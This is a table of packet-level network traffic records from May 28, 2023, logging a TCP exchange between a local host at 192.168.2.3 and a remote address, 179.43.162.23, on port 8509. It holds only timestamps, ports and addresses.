May 28, 2023 10:50:05.025897026 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.026484013 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026550055 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026555061 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.026568890 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026588917 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026627064 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.026638985 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026694059 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.026715994 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026737928 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026757956 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026782036 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026799917 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.026801109 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026822090 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026833057 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.026840925 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026859045 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026873112 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.026878119 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.026906967 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.027343035 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.027404070 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.027405977 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.027437925 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.027482033 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.027493954 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.027502060 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.027543068 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.027560949 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.027573109 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.027580976 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.027601004 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.027612925 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.027646065 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.027718067 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.027738094 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.027929068 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.028042078 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028064013 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028085947 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028104067 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028125048 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028134108 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.028143883 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028162956 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028162956 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.028182030 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028203011 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028212070 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.028222084 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028234959 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.028243065 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028271914 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028287888 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.028295040 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028315067 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028332949 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.028333902 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028352976 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.028376102 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.028423071 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.028973103 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029117107 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029136896 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029159069 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029177904 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029187918 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.029196978 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029213905 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.029217005 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029237986 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029258013 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.029283047 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029284000 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.029639959 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029694080 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.029756069 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029774904 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029795885 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029814005 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029833078 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029844999 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.029850960 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029875994 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.029894114 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029905081 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.029933929 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029952049 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.029969931 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030011892 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.030039072 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030042887 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.030059099 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030077934 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030095100 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030113935 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030133009 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.030133009 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.030483961 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030504942 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030524969 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030544996 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030550957 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.030565023 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030579090 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.030610085 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030621052 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.030627966 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030647039 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030664921 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.030673981 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.030713081 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.031043053 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031064987 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031083107 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031126022 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.031151056 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031204939 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031208038 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.031224966 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031280041 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031281948 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.031301022 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031320095 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031338930 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031357050 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031363010 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.031393051 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.031399012 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031419039 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031436920 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031455040 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.031476021 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031487942 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.031495094 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.031548977 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.033678055 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.039371014 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070213079 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070247889 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070265055 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070285082 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070302963 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070319891 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070338011 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070338011 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070338011 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070357084 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070375919 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070390940 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070390940 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070394993 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070414066 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070427895 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070432901 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070451021 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070465088 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070472002 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070492029 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070508957 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070509911 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070528030 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070545912 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070548058 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070584059 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070583105 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070601940 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070622921 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070636988 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070642948 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070664883 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070673943 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070683956 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070703030 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070718050 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070722103 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070741892 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070760965 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070764065 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070785999 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070801020 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070804119 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070822954 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070844889 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070859909 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070863962 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070878983 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070890903 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070899010 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070928097 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070947886 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070950031 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070967913 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070970058 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.070986986 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.070997953 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071007013 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071027040 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071037054 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071046114 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071067095 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071088076 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071108103 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071119070 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071127892 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071140051 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071146965 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071162939 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071166992 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071187019 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071206093 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071214914 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071225882 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071242094 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071245909 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071265936 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071284056 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071285963 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071306944 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071316957 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071326971 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071350098 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071357012 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071369886 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071388960 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071402073 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071408033 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071428061 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071444035 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071449041 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071469069 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071489096 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071496010 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071507931 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071527958 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071527958 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071547985 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071563959 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071568012 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071587086 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071594000 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071607113 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071628094 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071641922 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071646929 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071666956 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071686029 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071698904 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071706057 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071722031 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071724892 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071743965 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071763039 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071778059 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071784019 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071804047 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071818113 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071825027 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071842909 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071846008 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071865082 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071885109 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071891069 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071903944 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071928978 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.071932077 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071950912 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071970940 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071990013 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.071990013 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072009087 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072015047 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072030067 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072041035 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072048903 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072069883 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072079897 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072089911 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072108984 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072120905 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072127104 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072145939 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072165012 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072180033 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072185993 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072205067 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072216034 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072227001 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072237968 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072247028 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072279930 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072298050 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072299004 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072319031 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072334051 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072339058 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072357893 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072376966 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072377920 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072396040 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072412014 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072417021 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072436094 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072447062 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072455883 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072474957 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072490931 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072494030 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072514057 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072534084 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072552919 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072566986 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072566986 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072571993 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072592020 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072611094 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072619915 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072628975 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072643042 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072649002 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072669029 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072678089 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072689056 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072707891 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072725058 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072729111 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072750092 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072762966 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072768927 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072789907 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072804928 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072808981 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072829008 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072843075 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072849035 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072868109 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072880983 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072889090 CEST	8509	49699	179.43.162.23	192.168.2.3
